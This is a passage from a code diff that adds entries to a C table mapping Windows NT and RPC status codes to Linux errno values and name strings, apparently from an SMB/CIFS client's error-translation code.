++	"STATUS_INCOMPATIBLE_DRIVER_BLOCKED"},
++	{STATUS_HIVE_UNLOADED, -EIO, "STATUS_HIVE_UNLOADED"},
++	{STATUS_COMPRESSION_DISABLED, -EIO, "STATUS_COMPRESSION_DISABLED"},
++	{STATUS_FILE_SYSTEM_LIMITATION, -EIO, "STATUS_FILE_SYSTEM_LIMITATION"},
++	{STATUS_INVALID_IMAGE_HASH, -EIO, "STATUS_INVALID_IMAGE_HASH"},
++	{STATUS_NOT_CAPABLE, -EIO, "STATUS_NOT_CAPABLE"},
++	{STATUS_REQUEST_OUT_OF_SEQUENCE, -EIO,
++	"STATUS_REQUEST_OUT_OF_SEQUENCE"},
++	{STATUS_IMPLEMENTATION_LIMIT, -EIO, "STATUS_IMPLEMENTATION_LIMIT"},
++	{STATUS_ELEVATION_REQUIRED, -EIO, "STATUS_ELEVATION_REQUIRED"},
++	{STATUS_BEYOND_VDL, -EIO, "STATUS_BEYOND_VDL"},
++	{STATUS_ENCOUNTERED_WRITE_IN_PROGRESS, -EIO,
++	"STATUS_ENCOUNTERED_WRITE_IN_PROGRESS"},
++	{STATUS_PTE_CHANGED, -EIO, "STATUS_PTE_CHANGED"},
++	{STATUS_PURGE_FAILED, -EIO, "STATUS_PURGE_FAILED"},
++	{STATUS_CRED_REQUIRES_CONFIRMATION, -EIO,
++	"STATUS_CRED_REQUIRES_CONFIRMATION"},
++	{STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE, -EIO,
++	"STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE"},
++	{STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER, -EIO,
++	"STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER"},
++	{STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE, -EIO,
++	"STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE"},
++	{STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE, -EIO,
++	"STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE"},
++	{STATUS_CS_ENCRYPTION_FILE_NOT_CSE, -EIO,
++	"STATUS_CS_ENCRYPTION_FILE_NOT_CSE"},
++	{STATUS_INVALID_LABEL, -EIO, "STATUS_INVALID_LABEL"},
++	{STATUS_DRIVER_PROCESS_TERMINATED, -EIO,
++	"STATUS_DRIVER_PROCESS_TERMINATED"},
++	{STATUS_AMBIGUOUS_SYSTEM_DEVICE, -EIO,
++	"STATUS_AMBIGUOUS_SYSTEM_DEVICE"},
++	{STATUS_SYSTEM_DEVICE_NOT_FOUND, -EIO,
++	"STATUS_SYSTEM_DEVICE_NOT_FOUND"},
++	{STATUS_RESTART_BOOT_APPLICATION, -EIO,
++	"STATUS_RESTART_BOOT_APPLICATION"},
++	{STATUS_INVALID_TASK_NAME, -EIO, "STATUS_INVALID_TASK_NAME"},
++	{STATUS_INVALID_TASK_INDEX, -EIO, "STATUS_INVALID_TASK_INDEX"},
++	{STATUS_THREAD_ALREADY_IN_TASK, -EIO, "STATUS_THREAD_ALREADY_IN_TASK"},
++	{STATUS_CALLBACK_BYPASS, -EIO, "STATUS_CALLBACK_BYPASS"},
++	{STATUS_PORT_CLOSED, -EIO, "STATUS_PORT_CLOSED"},
++	{STATUS_MESSAGE_LOST, -EIO, "STATUS_MESSAGE_LOST"},
++	{STATUS_INVALID_MESSAGE, -EIO, "STATUS_INVALID_MESSAGE"},
++	{STATUS_REQUEST_CANCELED, -EIO, "STATUS_REQUEST_CANCELED"},
++	{STATUS_RECURSIVE_DISPATCH, -EIO, "STATUS_RECURSIVE_DISPATCH"},
++	{STATUS_LPC_RECEIVE_BUFFER_EXPECTED, -EIO,
++	"STATUS_LPC_RECEIVE_BUFFER_EXPECTED"},
++	{STATUS_LPC_INVALID_CONNECTION_USAGE, -EIO,
++	"STATUS_LPC_INVALID_CONNECTION_USAGE"},
++	{STATUS_LPC_REQUESTS_NOT_ALLOWED, -EIO,
++	"STATUS_LPC_REQUESTS_NOT_ALLOWED"},
++	{STATUS_RESOURCE_IN_USE, -EIO, "STATUS_RESOURCE_IN_USE"},
++	{STATUS_HARDWARE_MEMORY_ERROR, -EIO, "STATUS_HARDWARE_MEMORY_ERROR"},
++	{STATUS_THREADPOOL_HANDLE_EXCEPTION, -EIO,
++	"STATUS_THREADPOOL_HANDLE_EXCEPTION"},
++	{STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED, -EIO,
++	"STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED"},
++	{STATUS_THREADPOOL_RELEASED_DURING_OPERATION, -EIO,
++	"STATUS_THREADPOOL_RELEASED_DURING_OPERATION"},
++	{STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING, -EIO,
++	"STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING"},
++	{STATUS_APC_RETURNED_WHILE_IMPERSONATING, -EIO,
++	"STATUS_APC_RETURNED_WHILE_IMPERSONATING"},
++	{STATUS_PROCESS_IS_PROTECTED, -EIO, "STATUS_PROCESS_IS_PROTECTED"},
++	{STATUS_MCA_EXCEPTION, -EIO, "STATUS_MCA_EXCEPTION"},
++	{STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE, -EIO,
++	"STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE"},
++	{STATUS_SYMLINK_CLASS_DISABLED, -EIO, "STATUS_SYMLINK_CLASS_DISABLED"},
++	{STATUS_INVALID_IDN_NORMALIZATION, -EIO,
++	"STATUS_INVALID_IDN_NORMALIZATION"},
++	{STATUS_NO_UNICODE_TRANSLATION, -EIO, "STATUS_NO_UNICODE_TRANSLATION"},
++	{STATUS_ALREADY_REGISTERED, -EIO, "STATUS_ALREADY_REGISTERED"},
++	{STATUS_CONTEXT_MISMATCH, -EIO, "STATUS_CONTEXT_MISMATCH"},
++	{STATUS_PORT_ALREADY_HAS_COMPLETION_LIST, -EIO,
++	"STATUS_PORT_ALREADY_HAS_COMPLETION_LIST"},
++	{STATUS_CALLBACK_RETURNED_THREAD_PRIORITY, -EIO,
++	"STATUS_CALLBACK_RETURNED_THREAD_PRIORITY"},
++	{STATUS_INVALID_THREAD, -EIO, "STATUS_INVALID_THREAD"},
++	{STATUS_CALLBACK_RETURNED_TRANSACTION, -EIO,
++	"STATUS_CALLBACK_RETURNED_TRANSACTION"},
++	{STATUS_CALLBACK_RETURNED_LDR_LOCK, -EIO,
++	"STATUS_CALLBACK_RETURNED_LDR_LOCK"},
++	{STATUS_CALLBACK_RETURNED_LANG, -EIO, "STATUS_CALLBACK_RETURNED_LANG"},
++	{STATUS_CALLBACK_RETURNED_PRI_BACK, -EIO,
++	"STATUS_CALLBACK_RETURNED_PRI_BACK"},
++	{STATUS_CALLBACK_RETURNED_THREAD_AFFINITY, -EIO,
++	"STATUS_CALLBACK_RETURNED_THREAD_AFFINITY"},
++	{STATUS_DISK_REPAIR_DISABLED, -EIO, "STATUS_DISK_REPAIR_DISABLED"},
++	{STATUS_DS_DOMAIN_RENAME_IN_PROGRESS, -EIO,
++	"STATUS_DS_DOMAIN_RENAME_IN_PROGRESS"},
++	{STATUS_DISK_QUOTA_EXCEEDED, -EDQUOT, "STATUS_DISK_QUOTA_EXCEEDED"},
++	{STATUS_CONTENT_BLOCKED, -EIO, "STATUS_CONTENT_BLOCKED"},
++	{STATUS_BAD_CLUSTERS, -EIO, "STATUS_BAD_CLUSTERS"},
++	{STATUS_VOLUME_DIRTY, -EIO, "STATUS_VOLUME_DIRTY"},
++	{STATUS_FILE_CHECKED_OUT, -EIO, "STATUS_FILE_CHECKED_OUT"},
++	{STATUS_CHECKOUT_REQUIRED, -EIO, "STATUS_CHECKOUT_REQUIRED"},
++	{STATUS_BAD_FILE_TYPE, -EIO, "STATUS_BAD_FILE_TYPE"},
++	{STATUS_FILE_TOO_LARGE, -EIO, "STATUS_FILE_TOO_LARGE"},
++	{STATUS_FORMS_AUTH_REQUIRED, -EIO, "STATUS_FORMS_AUTH_REQUIRED"},
++	{STATUS_VIRUS_INFECTED, -EIO, "STATUS_VIRUS_INFECTED"},
++	{STATUS_VIRUS_DELETED, -EIO, "STATUS_VIRUS_DELETED"},
++	{STATUS_BAD_MCFG_TABLE, -EIO, "STATUS_BAD_MCFG_TABLE"},
++	{STATUS_WOW_ASSERTION, -EIO, "STATUS_WOW_ASSERTION"},
++	{STATUS_INVALID_SIGNATURE, -EIO, "STATUS_INVALID_SIGNATURE"},
++	{STATUS_HMAC_NOT_SUPPORTED, -EIO, "STATUS_HMAC_NOT_SUPPORTED"},
++	{STATUS_IPSEC_QUEUE_OVERFLOW, -EIO, "STATUS_IPSEC_QUEUE_OVERFLOW"},
++	{STATUS_ND_QUEUE_OVERFLOW, -EIO, "STATUS_ND_QUEUE_OVERFLOW"},
++	{STATUS_HOPLIMIT_EXCEEDED, -EIO, "STATUS_HOPLIMIT_EXCEEDED"},
++	{STATUS_PROTOCOL_NOT_SUPPORTED, -EOPNOTSUPP,
++	"STATUS_PROTOCOL_NOT_SUPPORTED"},
++	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED, -EIO,
++	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED"},
++	{STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR, -EIO,
++	"STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR"},
++	{STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR, -EIO,
++	"STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR"},
++	{STATUS_XML_PARSE_ERROR, -EIO, "STATUS_XML_PARSE_ERROR"},
++	{STATUS_XMLDSIG_ERROR, -EIO, "STATUS_XMLDSIG_ERROR"},
++	{STATUS_WRONG_COMPARTMENT, -EIO, "STATUS_WRONG_COMPARTMENT"},
++	{STATUS_AUTHIP_FAILURE, -EIO, "STATUS_AUTHIP_FAILURE"},
++	{DBG_NO_STATE_CHANGE, -EIO, "DBG_NO_STATE_CHANGE"},
++	{DBG_APP_NOT_IDLE, -EIO, "DBG_APP_NOT_IDLE"},
++	{RPC_NT_INVALID_STRING_BINDING, -EIO, "RPC_NT_INVALID_STRING_BINDING"},
++	{RPC_NT_WRONG_KIND_OF_BINDING, -EIO, "RPC_NT_WRONG_KIND_OF_BINDING"},
++	{RPC_NT_INVALID_BINDING, -EIO, "RPC_NT_INVALID_BINDING"},
++	{RPC_NT_PROTSEQ_NOT_SUPPORTED, -EOPNOTSUPP,
++	"RPC_NT_PROTSEQ_NOT_SUPPORTED"},
++	{RPC_NT_INVALID_RPC_PROTSEQ, -EIO, "RPC_NT_INVALID_RPC_PROTSEQ"},
++	{RPC_NT_INVALID_STRING_UUID, -EIO, "RPC_NT_INVALID_STRING_UUID"},
++	{RPC_NT_INVALID_ENDPOINT_FORMAT, -EIO,
++	"RPC_NT_INVALID_ENDPOINT_FORMAT"},
++	{RPC_NT_INVALID_NET_ADDR, -EIO, "RPC_NT_INVALID_NET_ADDR"},
++	{RPC_NT_NO_ENDPOINT_FOUND, -EIO, "RPC_NT_NO_ENDPOINT_FOUND"},
++	{RPC_NT_INVALID_TIMEOUT, -EINVAL, "RPC_NT_INVALID_TIMEOUT"},
++	{RPC_NT_OBJECT_NOT_FOUND, -ENOENT, "RPC_NT_OBJECT_NOT_FOUND"},
++	{RPC_NT_ALREADY_REGISTERED, -EIO, "RPC_NT_ALREADY_REGISTERED"},
++	{RPC_NT_TYPE_ALREADY_REGISTERED, -EIO,
++	"RPC_NT_TYPE_ALREADY_REGISTERED"},
++	{RPC_NT_ALREADY_LISTENING, -EIO, "RPC_NT_ALREADY_LISTENING"},
++	{RPC_NT_NO_PROTSEQS_REGISTERED, -EIO, "RPC_NT_NO_PROTSEQS_REGISTERED"},
++	{RPC_NT_NOT_LISTENING, -EIO, "RPC_NT_NOT_LISTENING"},
++	{RPC_NT_UNKNOWN_MGR_TYPE, -EIO, "RPC_NT_UNKNOWN_MGR_TYPE"},
++	{RPC_NT_UNKNOWN_IF, -EIO, "RPC_NT_UNKNOWN_IF"},
++	{RPC_NT_NO_BINDINGS, -EIO, "RPC_NT_NO_BINDINGS"},
++	{RPC_NT_NO_PROTSEQS, -EIO, "RPC_NT_NO_PROTSEQS"},
++	{RPC_NT_CANT_CREATE_ENDPOINT, -EIO, "RPC_NT_CANT_CREATE_ENDPOINT"},
++	{RPC_NT_OUT_OF_RESOURCES, -EIO, "RPC_NT_OUT_OF_RESOURCES"},
++	{RPC_NT_SERVER_UNAVAILABLE, -EIO, "RPC_NT_SERVER_UNAVAILABLE"},
++	{RPC_NT_SERVER_TOO_BUSY, -EBUSY, "RPC_NT_SERVER_TOO_BUSY"},
++	{RPC_NT_INVALID_NETWORK_OPTIONS, -EIO,
++	"RPC_NT_INVALID_NETWORK_OPTIONS"},
++	{RPC_NT_NO_CALL_ACTIVE, -EIO, "RPC_NT_NO_CALL_ACTIVE"},
++	{RPC_NT_CALL_FAILED, -EIO, "RPC_NT_CALL_FAILED"},
++	{RPC_NT_CALL_FAILED_DNE, -EIO, "RPC_NT_CALL_FAILED_DNE"},
++	{RPC_NT_PROTOCOL_ERROR, -EIO, "RPC_NT_PROTOCOL_ERROR"},
++	{RPC_NT_UNSUPPORTED_TRANS_SYN, -EIO, "RPC_NT_UNSUPPORTED_TRANS_SYN"},
++	{RPC_NT_UNSUPPORTED_TYPE, -EIO, "RPC_NT_UNSUPPORTED_TYPE"},
++	{RPC_NT_INVALID_TAG, -EIO, "RPC_NT_INVALID_TAG"},
++	{RPC_NT_INVALID_BOUND, -EIO, "RPC_NT_INVALID_BOUND"},
++	{RPC_NT_NO_ENTRY_NAME, -EIO, "RPC_NT_NO_ENTRY_NAME"},
++	{RPC_NT_INVALID_NAME_SYNTAX, -EIO, "RPC_NT_INVALID_NAME_SYNTAX"},
++	{RPC_NT_UNSUPPORTED_NAME_SYNTAX, -EIO,
++	"RPC_NT_UNSUPPORTED_NAME_SYNTAX"},
++	{RPC_NT_UUID_NO_ADDRESS, -EIO, "RPC_NT_UUID_NO_ADDRESS"},
++	{RPC_NT_DUPLICATE_ENDPOINT, -ENOTUNIQ, "RPC_NT_DUPLICATE_ENDPOINT"},
++	{RPC_NT_UNKNOWN_AUTHN_TYPE, -EIO, "RPC_NT_UNKNOWN_AUTHN_TYPE"},
++	{RPC_NT_MAX_CALLS_TOO_SMALL, -EIO, "RPC_NT_MAX_CALLS_TOO_SMALL"},
++	{RPC_NT_STRING_TOO_LONG, -EIO, "RPC_NT_STRING_TOO_LONG"},
++	{RPC_NT_PROTSEQ_NOT_FOUND, -EIO, "RPC_NT_PROTSEQ_NOT_FOUND"},
++	{RPC_NT_PROCNUM_OUT_OF_RANGE, -EIO, "RPC_NT_PROCNUM_OUT_OF_RANGE"},
++	{RPC_NT_BINDING_HAS_NO_AUTH, -EIO, "RPC_NT_BINDING_HAS_NO_AUTH"},
++	{RPC_NT_UNKNOWN_AUTHN_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHN_SERVICE"},
++	{RPC_NT_UNKNOWN_AUTHN_LEVEL, -EIO, "RPC_NT_UNKNOWN_AUTHN_LEVEL"},
++	{RPC_NT_INVALID_AUTH_IDENTITY, -EIO, "RPC_NT_INVALID_AUTH_IDENTITY"},
++	{RPC_NT_UNKNOWN_AUTHZ_SERVICE, -EIO, "RPC_NT_UNKNOWN_AUTHZ_SERVICE"},
++	{EPT_NT_INVALID_ENTRY, -EIO, "EPT_NT_INVALID_ENTRY"},
++	{EPT_NT_CANT_PERFORM_OP, -EIO, "EPT_NT_CANT_PERFORM_OP"},
++	{EPT_NT_NOT_REGISTERED, -EIO, "EPT_NT_NOT_REGISTERED"},
++	{RPC_NT_NOTHING_TO_EXPORT, -EIO, "RPC_NT_NOTHING_TO_EXPORT"},
++	{RPC_NT_INCOMPLETE_NAME, -EIO, "RPC_NT_INCOMPLETE_NAME"},
++	{RPC_NT_INVALID_VERS_OPTION, -EIO, "RPC_NT_INVALID_VERS_OPTION"},
++	{RPC_NT_NO_MORE_MEMBERS, -EIO, "RPC_NT_NO_MORE_MEMBERS"},
++	{RPC_NT_NOT_ALL_OBJS_UNEXPORTED, -EIO,
++	"RPC_NT_NOT_ALL_OBJS_UNEXPORTED"},
++	{RPC_NT_INTERFACE_NOT_FOUND, -EIO, "RPC_NT_INTERFACE_NOT_FOUND"},
++	{RPC_NT_ENTRY_ALREADY_EXISTS, -EIO, "RPC_NT_ENTRY_ALREADY_EXISTS"},
++	{RPC_NT_ENTRY_NOT_FOUND, -EIO, "RPC_NT_ENTRY_NOT_FOUND"},
++	{RPC_NT_NAME_SERVICE_UNAVAILABLE, -EIO,
++	"RPC_NT_NAME_SERVICE_UNAVAILABLE"},
++	{RPC_NT_INVALID_NAF_ID, -EIO, "RPC_NT_INVALID_NAF_ID"},
++	{RPC_NT_CANNOT_SUPPORT, -EOPNOTSUPP, "RPC_NT_CANNOT_SUPPORT"},
++	{RPC_NT_NO_CONTEXT_AVAILABLE, -EIO, "RPC_NT_NO_CONTEXT_AVAILABLE"},
++	{RPC_NT_INTERNAL_ERROR, -EIO, "RPC_NT_INTERNAL_ERROR"},
++	{RPC_NT_ZERO_DIVIDE, -EIO, "RPC_NT_ZERO_DIVIDE"},
++	{RPC_NT_ADDRESS_ERROR, -EIO, "RPC_NT_ADDRESS_ERROR"},
++	{RPC_NT_FP_DIV_ZERO, -EIO, "RPC_NT_FP_DIV_ZERO"},
++	{RPC_NT_FP_UNDERFLOW, -EIO, "RPC_NT_FP_UNDERFLOW"},
++	{RPC_NT_FP_OVERFLOW, -EIO, "RPC_NT_FP_OVERFLOW"},
++	{RPC_NT_CALL_IN_PROGRESS, -EIO, "RPC_NT_CALL_IN_PROGRESS"},
++	{RPC_NT_NO_MORE_BINDINGS, -EIO, "RPC_NT_NO_MORE_BINDINGS"},
++	{RPC_NT_GROUP_MEMBER_NOT_FOUND, -EIO, "RPC_NT_GROUP_MEMBER_NOT_FOUND"},
++	{EPT_NT_CANT_CREATE, -EIO, "EPT_NT_CANT_CREATE"},
++	{RPC_NT_INVALID_OBJECT, -EIO, "RPC_NT_INVALID_OBJECT"},
++	{RPC_NT_NO_INTERFACES, -EIO, "RPC_NT_NO_INTERFACES"},
++	{RPC_NT_CALL_CANCELLED, -EIO, "RPC_NT_CALL_CANCELLED"},
++	{RPC_NT_BINDING_INCOMPLETE, -EIO, "RPC_NT_BINDING_INCOMPLETE"},
++	{RPC_NT_COMM_FAILURE, -EIO, "RPC_NT_COMM_FAILURE"},
++	{RPC_NT_UNSUPPORTED_AUTHN_LEVEL, -EIO,
++	"RPC_NT_UNSUPPORTED_AUTHN_LEVEL"},
++	{RPC_NT_NO_PRINC_NAME, -EIO, "RPC_NT_NO_PRINC_NAME"},
++	{RPC_NT_NOT_RPC_ERROR, -EIO, "RPC_NT_NOT_RPC_ERROR"},
++	{RPC_NT_SEC_PKG_ERROR, -EIO, "RPC_NT_SEC_PKG_ERROR"},
++	{RPC_NT_NOT_CANCELLED, -EIO, "RPC_NT_NOT_CANCELLED"},
++	{RPC_NT_INVALID_ASYNC_HANDLE, -EIO, "RPC_NT_INVALID_ASYNC_HANDLE"},
++	{RPC_NT_INVALID_ASYNC_CALL, -EIO, "RPC_NT_INVALID_ASYNC_CALL"},
++	{RPC_NT_PROXY_ACCESS_DENIED, -EACCES, "RPC_NT_PROXY_ACCESS_DENIED"},
++	{RPC_NT_NO_MORE_ENTRIES, -EIO, "RPC_NT_NO_MORE_ENTRIES"},
++	{RPC_NT_SS_CHAR_TRANS_OPEN_FAIL, -EIO,
++	"RPC_NT_SS_CHAR_TRANS_OPEN_FAIL"},
++	{RPC_NT_SS_CHAR_TRANS_SHORT_FILE, -EIO,
++	"RPC_NT_SS_CHAR_TRANS_SHORT_FILE"},
++	{RPC_NT_SS_IN_NULL_CONTEXT, -EIO, "RPC_NT_SS_IN_NULL_CONTEXT"},
++	{RPC_NT_SS_CONTEXT_MISMATCH, -EIO, "RPC_NT_SS_CONTEXT_MISMATCH"},
++	{RPC_NT_SS_CONTEXT_DAMAGED, -EIO, "RPC_NT_SS_CONTEXT_DAMAGED"},
++	{RPC_NT_SS_HANDLES_MISMATCH, -EIO, "RPC_NT_SS_HANDLES_MISMATCH"},
++	{RPC_NT_SS_CANNOT_GET_CALL_HANDLE, -EIO,
++	"RPC_NT_SS_CANNOT_GET_CALL_HANDLE"},
++	{RPC_NT_NULL_REF_POINTER, -EIO, "RPC_NT_NULL_REF_POINTER"},
++	{RPC_NT_ENUM_VALUE_OUT_OF_RANGE, -EIO,
++	"RPC_NT_ENUM_VALUE_OUT_OF_RANGE"},
++	{RPC_NT_BYTE_COUNT_TOO_SMALL, -EIO, "RPC_NT_BYTE_COUNT_TOO_SMALL"},
++	{RPC_NT_BAD_STUB_DATA, -EIO, "RPC_NT_BAD_STUB_DATA"},
++	{RPC_NT_INVALID_ES_ACTION, -EIO, "RPC_NT_INVALID_ES_ACTION"},
++	{RPC_NT_WRONG_ES_VERSION, -EIO, "RPC_NT_WRONG_ES_VERSION"},
++	{RPC_NT_WRONG_STUB_VERSION, -EIO, "RPC_NT_WRONG_STUB_VERSION"},
++	{RPC_NT_INVALID_PIPE_OBJECT, -EIO, "RPC_NT_INVALID_PIPE_OBJECT"},
++	{RPC_NT_INVALID_PIPE_OPERATION, -EIO, "RPC_NT_INVALID_PIPE_OPERATION"},
++	{RPC_NT_WRONG_PIPE_VERSION, -EIO, "RPC_NT_WRONG_PIPE_VERSION"},
++	{RPC_NT_PIPE_CLOSED, -EIO, "RPC_NT_PIPE_CLOSED"},
++	{RPC_NT_PIPE_DISCIPLINE_ERROR, -EIO, "RPC_NT_PIPE_DISCIPLINE_ERROR"},
++	{RPC_NT_PIPE_EMPTY, -EIO, "RPC_NT_PIPE_EMPTY"},
++	{STATUS_PNP_BAD_MPS_TABLE, -EIO, "STATUS_PNP_BAD_MPS_TABLE"},
++	{STATUS_PNP_TRANSLATION_FAILED, -EIO, "STATUS_PNP_TRANSLATION_FAILED"},
++	{STATUS_PNP_IRQ_TRANSLATION_FAILED, -EIO,
++	"STATUS_PNP_IRQ_TRANSLATION_FAILED"},
++	{STATUS_PNP_INVALID_ID, -EIO, "STATUS_PNP_INVALID_ID"},
++	{STATUS_IO_REISSUE_AS_CACHED, -EIO, "STATUS_IO_REISSUE_AS_CACHED"},
++	{STATUS_CTX_WINSTATION_NAME_INVALID, -EIO,
++	"STATUS_CTX_WINSTATION_NAME_INVALID"},
++	{STATUS_CTX_INVALID_PD, -EIO, "STATUS_CTX_INVALID_PD"},
++	{STATUS_CTX_PD_NOT_FOUND, -EIO, "STATUS_CTX_PD_NOT_FOUND"},
++	{STATUS_CTX_CLOSE_PENDING, -EIO, "STATUS_CTX_CLOSE_PENDING"},
++	{STATUS_CTX_NO_OUTBUF, -EIO, "STATUS_CTX_NO_OUTBUF"},
++	{STATUS_CTX_MODEM_INF_NOT_FOUND, -EIO,
++	"STATUS_CTX_MODEM_INF_NOT_FOUND"},
++	{STATUS_CTX_INVALID_MODEMNAME, -EIO, "STATUS_CTX_INVALID_MODEMNAME"},
++	{STATUS_CTX_RESPONSE_ERROR, -EIO, "STATUS_CTX_RESPONSE_ERROR"},
++	{STATUS_CTX_MODEM_RESPONSE_TIMEOUT, -ETIMEDOUT,
++	"STATUS_CTX_MODEM_RESPONSE_TIMEOUT"},
++	{STATUS_CTX_MODEM_RESPONSE_NO_CARRIER, -EIO,
++	"STATUS_CTX_MODEM_RESPONSE_NO_CARRIER"},
++	{STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE, -EIO,
++	"STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE"},
++	{STATUS_CTX_MODEM_RESPONSE_BUSY, -EBUSY,
++	"STATUS_CTX_MODEM_RESPONSE_BUSY"},
++	{STATUS_CTX_MODEM_RESPONSE_VOICE, -EIO,
++	"STATUS_CTX_MODEM_RESPONSE_VOICE"},
++	{STATUS_CTX_TD_ERROR, -EIO, "STATUS_CTX_TD_ERROR"},
++	{STATUS_CTX_LICENSE_CLIENT_INVALID, -EIO,
++	"STATUS_CTX_LICENSE_CLIENT_INVALID"},
++	{STATUS_CTX_LICENSE_NOT_AVAILABLE, -EIO,
++	"STATUS_CTX_LICENSE_NOT_AVAILABLE"},
++	{STATUS_CTX_LICENSE_EXPIRED, -EIO, "STATUS_CTX_LICENSE_EXPIRED"},
++	{STATUS_CTX_WINSTATION_NOT_FOUND, -EIO,
++	"STATUS_CTX_WINSTATION_NOT_FOUND"},
++	{STATUS_CTX_WINSTATION_NAME_COLLISION, -EIO,
++	"STATUS_CTX_WINSTATION_NAME_COLLISION"},
++	{STATUS_CTX_WINSTATION_BUSY, -EBUSY, "STATUS_CTX_WINSTATION_BUSY"},
++	{STATUS_CTX_BAD_VIDEO_MODE, -EIO, "STATUS_CTX_BAD_VIDEO_MODE"},
++	{STATUS_CTX_GRAPHICS_INVALID, -EIO, "STATUS_CTX_GRAPHICS_INVALID"},
++	{STATUS_CTX_NOT_CONSOLE, -EIO, "STATUS_CTX_NOT_CONSOLE"},
++	{STATUS_CTX_CLIENT_QUERY_TIMEOUT, -EIO,
++	"STATUS_CTX_CLIENT_QUERY_TIMEOUT"},
++	{STATUS_CTX_CONSOLE_DISCONNECT, -EIO, "STATUS_CTX_CONSOLE_DISCONNECT"},
++	{STATUS_CTX_CONSOLE_CONNECT, -EIO, "STATUS_CTX_CONSOLE_CONNECT"},
++	{STATUS_CTX_SHADOW_DENIED, -EIO, "STATUS_CTX_SHADOW_DENIED"},
++	{STATUS_CTX_WINSTATION_ACCESS_DENIED, -EACCES,
++	"STATUS_CTX_WINSTATION_ACCESS_DENIED"},
++	{STATUS_CTX_INVALID_WD, -EIO, "STATUS_CTX_INVALID_WD"},
++	{STATUS_CTX_WD_NOT_FOUND, -EIO, "STATUS_CTX_WD_NOT_FOUND"},
++	{STATUS_CTX_SHADOW_INVALID, -EIO, "STATUS_CTX_SHADOW_INVALID"},
++	{STATUS_CTX_SHADOW_DISABLED, -EIO, "STATUS_CTX_SHADOW_DISABLED"},
++	{STATUS_RDP_PROTOCOL_ERROR, -EIO, "STATUS_RDP_PROTOCOL_ERROR"},
++	{STATUS_CTX_CLIENT_LICENSE_NOT_SET, -EIO,
++	"STATUS_CTX_CLIENT_LICENSE_NOT_SET"},
++	{STATUS_CTX_CLIENT_LICENSE_IN_USE, -EIO,
++	"STATUS_CTX_CLIENT_LICENSE_IN_USE"},
++	{STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE, -EIO,
++	"STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE"},
++	{STATUS_CTX_SHADOW_NOT_RUNNING, -EIO, "STATUS_CTX_SHADOW_NOT_RUNNING"},
++	{STATUS_CTX_LOGON_DISABLED, -EIO, "STATUS_CTX_LOGON_DISABLED"},
++	{STATUS_CTX_SECURITY_LAYER_ERROR, -EIO,
++	"STATUS_CTX_SECURITY_LAYER_ERROR"},
++	{STATUS_TS_INCOMPATIBLE_SESSIONS, -EIO,
++	"STATUS_TS_INCOMPATIBLE_SESSIONS"},
++	{STATUS_MUI_FILE_NOT_FOUND, -EIO, "STATUS_MUI_FILE_NOT_FOUND"},
++	{STATUS_MUI_INVALID_FILE, -EIO, "STATUS_MUI_INVALID_FILE"},
++	{STATUS_MUI_INVALID_RC_CONFIG, -EIO, "STATUS_MUI_INVALID_RC_CONFIG"},
++	{STATUS_MUI_INVALID_LOCALE_NAME, -EIO,
++	"STATUS_MUI_INVALID_LOCALE_NAME"},
++	{STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME, -EIO,
++	"STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME"},
++	{STATUS_MUI_FILE_NOT_LOADED, -EIO, "STATUS_MUI_FILE_NOT_LOADED"},
++	{STATUS_RESOURCE_ENUM_USER_STOP, -EIO,
++	"STATUS_RESOURCE_ENUM_USER_STOP"},
++	{STATUS_CLUSTER_INVALID_NODE, -EIO, "STATUS_CLUSTER_INVALID_NODE"},
++	{STATUS_CLUSTER_NODE_EXISTS, -EIO, "STATUS_CLUSTER_NODE_EXISTS"},
++	{STATUS_CLUSTER_JOIN_IN_PROGRESS, -EIO,
++	"STATUS_CLUSTER_JOIN_IN_PROGRESS"},
++	{STATUS_CLUSTER_NODE_NOT_FOUND, -EIO, "STATUS_CLUSTER_NODE_NOT_FOUND"},
++	{STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND, -EIO,
++	"STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND"},
++	{STATUS_CLUSTER_NETWORK_EXISTS, -EIO, "STATUS_CLUSTER_NETWORK_EXISTS"},
++	{STATUS_CLUSTER_NETWORK_NOT_FOUND, -EIO,
++	"STATUS_CLUSTER_NETWORK_NOT_FOUND"},
++	{STATUS_CLUSTER_NETINTERFACE_EXISTS, -EIO,
++	"STATUS_CLUSTER_NETINTERFACE_EXISTS"},
++	{STATUS_CLUSTER_NETINTERFACE_NOT_FOUND, -EIO,
